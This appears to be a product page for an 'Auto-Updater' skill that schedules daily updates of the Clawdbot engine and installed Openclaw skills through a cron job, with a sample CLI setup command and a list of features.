What is Auto-Updater?

The Auto-Updater is a critical maintenance skill designed to ensure your AI environment remains secure, stable, and feature-complete. By automating the update lifecycle, it eliminates the need for manual intervention when keeping your core system and your library of Openclaw Skills up to date. It runs as a background process, checking for new releases and applying them during off-peak hours.

This skill bridges the gap between manual management and a hands-off developer experience. Whether you are using npm, pnpm, or bun, the Auto-Updater handles the complexities of versioning and migrations, delivering a detailed summary of all changes directly to your preferred communication session.

Auto-Updater Use Cases

  • Automating daily maintenance for a fleet of AI agents to ensure consistent performance.
  • Keeping your collection of Openclaw Skills synchronized with the latest registry versions without manual commands.
  • Ensuring system security by automatically applying patches to the core Clawdbot engine.
  • Monitoring version changes through automated daily status reports and change summaries.

How Auto-Updater Works

  1. The skill utilizes a scheduled cron job (defaulting to 4:00 AM) managed by the openclaw-agent utility.
  2. Upon activation, the agent checks the current version of Clawdbot against the latest available release on the relevant package manager.
  3. It executes the clawdhub update --all command to scan and update every individual Openclaw Skills instance installed in the environment.
  4. Post-update, it runs a system health check via clawdbot doctor to apply migrations or environment fixes.
  5. Finally, it compiles a summary of the version increments and delivers a formatted message to the user.

Auto-Updater Setup

Before setting up this skill, the openclaw-agent must be installed and running on your system.

Quick Start Command: Ask your agent: "Set up daily auto-updates for yourself and all your skills."

Manual CLI Setup:

clawdbot cron add \
  --name "Daily Auto-Update" \
  --cron "0 4 * * *" \
  --tz "America/Los_Angeles" \
  --session isolated \
  --wake now \
  --deliver \
--message "Run daily auto-updates: check for Clawdbot updates and update all skills. Report what was updated."

Auto-Updater Data Schema & Taxonomy

The Auto-Updater interacts with the system via the following configuration and output structure:

Attribute Description
cron.name The unique identifier for the update task in the scheduler
cron.schedule The timing frequency for updates defined in CRON syntax
update_summary A generated report containing version deltas for Openclaw Skills
agent_dependency Required active connection to the openclaw-agent executable

Auto-Updater Advanced Features

  • Support for dry-run checks to verify available updates without applying them immediately.
  • Intelligent package manager detection supporting npm, pnpm, and bun for core system updates.
  • Detailed reporting that categorizes Openclaw Skills into updated vs. already current lists.
  • Isolated session execution to prevent maintenance tasks from interrupting active agent workflows.
  • Cross-platform compatibility ensuring seamless updates on Windows, macOS, and Linux.
